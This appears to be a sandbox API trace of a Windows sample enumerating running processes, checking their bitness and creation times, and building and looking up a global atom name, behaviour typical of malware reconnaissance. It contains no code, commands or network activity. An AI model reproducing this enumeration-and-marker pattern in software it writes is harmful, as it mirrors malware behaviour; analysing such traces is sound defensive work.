	[0126.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.007] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.007] CloseHandle (hObject=0x69c) returned 1
	[0126.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d4a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.007] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.007] CloseHandle (hObject=0x69c) returned 1
	[0126.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d248, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.008] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.008] CloseHandle (hObject=0x69c) returned 1
	[0126.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.008] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.008] CloseHandle (hObject=0x69c) returned 1
	[0126.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.009] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.009] CloseHandle (hObject=0x69c) returned 1
	[0126.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.009] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.009] CloseHandle (hObject=0x69c) returned 1
	[0126.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.009] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.009] CloseHandle (hObject=0x69c) returned 1
	[0126.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.010] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.010] CloseHandle (hObject=0x69c) returned 1
	[0126.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.010] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.010] CloseHandle (hObject=0x69c) returned 1
	[0126.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.011] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.011] CloseHandle (hObject=0x69c) returned 1
	[0126.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.011] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.011] CloseHandle (hObject=0x69c) returned 1
	[0126.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.011] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.011] CloseHandle (hObject=0x69c) returned 1
	[0126.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.012] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.012] CloseHandle (hObject=0x69c) returned 1
	[0126.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d248, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.012] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.012] CloseHandle (hObject=0x69c) returned 1
	[0126.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b97a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.012] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.013] CloseHandle (hObject=0x69c) returned 1
	[0126.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.013] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.013] CloseHandle (hObject=0x69c) returned 1
	[0126.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.013] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.013] CloseHandle (hObject=0x69c) returned 1
	[0126.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.014] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.014] CloseHandle (hObject=0x69c) returned 1
	[0126.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d4c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.014] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.014] CloseHandle (hObject=0x69c) returned 1
	[0126.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d4a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.015] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.015] CloseHandle (hObject=0x69c) returned 1
	[0126.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.015] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.015] CloseHandle (hObject=0x69c) returned 1
	[0126.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.016] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.016] CloseHandle (hObject=0x69c) returned 1
	[0126.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.016] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.016] CloseHandle (hObject=0x69c) returned 1
	[0126.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.017] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.017] CloseHandle (hObject=0x69c) returned 1
	[0126.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.017] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.017] CloseHandle (hObject=0x69c) returned 1
	[0126.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d368, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.017] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.017] CloseHandle (hObject=0x69c) returned 1
	[0126.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.018] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.018] CloseHandle (hObject=0x69c) returned 1
	[0126.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d368, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.018] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.018] CloseHandle (hObject=0x69c) returned 1
	[0126.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.018] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.018] CloseHandle (hObject=0x69c) returned 1
	[0126.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b97a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.019] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.019] CloseHandle (hObject=0x69c) returned 1
	[0126.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.019] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetLastError () returned 0x5
	[0126.020] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.021] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.021] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] GetLastError () returned 0x5
	[0126.021] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.022] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetLastError () returned 0x5
	[0126.023] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.023] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.024] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.024] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.024] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.024] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.024] CloseHandle (hObject=0x69c) returned 1
	[0126.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.025] CloseHandle (hObject=0x69c) returned 1
	[0126.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.025] CloseHandle (hObject=0x69c) returned 1
	[0126.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.026] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.026] CloseHandle (hObject=0x69c) returned 1
	[0126.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.026] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.026] CloseHandle (hObject=0x69c) returned 1
